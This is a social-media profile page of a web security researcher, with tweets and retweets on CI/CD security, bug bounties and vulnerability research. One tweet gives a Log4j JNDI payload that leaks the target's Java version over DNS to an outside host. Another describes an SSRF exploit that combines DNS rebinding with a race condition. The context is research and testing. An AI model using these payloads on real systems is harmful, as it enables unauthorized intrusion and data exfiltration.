KarimPwnz Profile Banner
Karim Rahal Profile
Karim Rahal

@KarimPwnz

Followers
3K
Following
4K
Statuses
388

I hack.

Joined January 2013
Don't wanna be here? Send us removal request.
@KarimPwnz
Karim Rahal
8 months
RT @Doyensec: Checkout @maxenceschmitt's presentation at @owasp's Global AppSec in Lisbon to learn how Client-Side Path Traversal can be le…
0
10
0
@KarimPwnz
Karim Rahal
8 months
RT @Doyensec: We're excited to announce @KarimPwnz is the latest addition to the #Doyensec team! Welcome aboard!
Tweet media one
0
2
0
@KarimPwnz
Karim Rahal
1 year
👋 I'm graduating (Spring 2024), and I am looking for a security role in the US. My interests include web app security, CI/CD security, and open-source security. Email - karim@karimrahal.com LinkedIn - Any RT for reach would be appreciated ❤️
0
8
11
@KarimPwnz
Karim Rahal
1 year
RT @TupleType: How a worm 🪱 can be used to compromise @github repositories at scale through the Actions dependency tree🌲? The blog details…
0
8
0
@KarimPwnz
Karim Rahal
1 year
RT @clintgibler: 🔐 How Secrets Leak in CI/CD Pipelines This post describes a number of subtle ways secrets can leak in CI 😅 Second-order…
0
57
0
@KarimPwnz
Karim Rahal
2 years
@ElSec_ 🔥🔥🔥🔥
0
0
1
@KarimPwnz
Karim Rahal
2 years
@adnanthekhan Thank you so much for the kind tweet <3 Gato looks super cool and useful; I didn't know about it. Let me know if you end up adding any of the techniques. That would be awesome!
0
0
1
@KarimPwnz
Karim Rahal
2 years
RT @alngpwn: Read my writeup and exploit for a Use-After-Free Vulnerability in Artifex MuJS (CVE-2022-44789): Hop…
0
10
0
@KarimPwnz
Karim Rahal
2 years
@xscorp7 Thank you ❤️❤️
0
0
1
@KarimPwnz
Karim Rahal
2 years
@Sonar_Research Yes, it's an SSRF through DNS rebinding. Exploit: /avatar/.attacker.com You point unstable-avatar-service.tld.attacker[.]com to which switches between 127.0.0.1 (private IP) and 93.184.216.34 (public IP). Then, you race condition to bypass line 14.
1
0
3
@KarimPwnz
Karim Rahal
3 years
The "Example Usage" above allowed me to find GitHub Actions vulnerable to command injection. The scripts can also compliment the workflow suggested by @snyff:
@snyff
Louis Nyffenegger
3 years
Do you want to find new vulnerabilities? 1. Look at the patch for a recent CVE (for example: CVE-2021-43350) 2. Write a @semgrep rule for them (tune your rule using the CVE you picked) 3. Scan a lot of code repository with this rule. 4. Manually confirm the matches.
0
1
8
@KarimPwnz
Karim Rahal
3 years
Looking to test the Log4j RCE? Give a try. ${jndi:ldap://${sys:java:version}.target.dns-exfil-host/}
0
3
12
@KarimPwnz
Karim Rahal
3 years
RT @rub003: Instead of relying on third parties and giving your findings/data away to them, why not use a custom DNS logger. For example dn…
0
17
0
@KarimPwnz
Karim Rahal
3 years
@akita_zen @rub003 Fair lol. The tool is mostly meant for bypassing blocklists or exfiltrating data through DNS. But the added privacy is also useful, you know!
1
0
3
@KarimPwnz
Karim Rahal
3 years
@rub003 Thank you for the shoutout ❤️
0
0
2
@KarimPwnz
Karim Rahal
3 years
RT @estark37: after a bit of a blogging hiatus, here are some rambling thoughts on splitting up trust (oblivious DNS, Prio, etc.): https://…
0
13
0
@KarimPwnz
Karim Rahal
4 years
@codingo_ @infosec_au @Bugcrowd Given that triagers have to deal with a significant number of invalid/spam reports, what steps is @Bugcrowd taking to minimize burnout amongst triagers?
0
0
2